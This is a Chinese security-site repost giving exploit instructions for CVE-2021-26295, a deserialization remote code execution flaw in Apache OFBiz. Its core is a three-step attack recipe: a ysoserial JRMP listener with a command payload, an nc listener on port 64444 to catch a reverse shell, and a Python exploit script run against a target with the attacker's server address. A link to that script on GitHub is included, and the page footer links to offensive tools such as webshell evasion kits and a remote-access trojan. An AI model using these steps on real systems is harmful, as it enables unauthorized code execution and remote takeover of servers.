CVE-2021-26295 EXP

2021年3月25日11:51:42评论683 views字数 411阅读1分22秒阅读模式

CVE-2021-26295

CVE-2021-26295 EXP可成功反弹壳牌

本文以及工具仅限于技术共享，不能用于非法用途，否则会导致一切后果自行承担。

Apache OFBiz 序列化远程代码执行漏洞

触发命令执行EXP

1. VPS启动`RMI`监听`9999`端口

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] '

2. VPS启动`nc`监听`64444`端口

nc -lvp 64444

3.执行python脚本

python3 cve-2021-26295_exp.py <目标>  < vps_ip >  < vps_port >

示例

CVE-2021-26295 EXP

CVE-2021-26295 EXP

可以利用

https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py

CVE-2021-26295 EXP

本文始发于微信公众号（Ots安全）：CVE-2021-26295 EXP

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

XG_NTAI: Webshell免杀、流量加密传输工具 V2.5

工具 | NavicatPwn

Yakit的免配置浏览器不是内置浏览器

基于AI自动绕过WAF的burp插件

Windows远控利器：Quasar

Spring漏洞扫描工具，springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证

若依Vue漏洞检测工具V5

超全渗透测试工具库

ScopeSentry:V1.7-内置800+密钥检测-ICP、APP、小程序自动化收集APP自动化反编译敏感信息查找

最新Chrome应用加密解密工具

本文由 admin 发表于 2021年3月25日11:51:42
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
CVE-2021-26295 EXPhttps://cn-sec.com/archives/299487.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码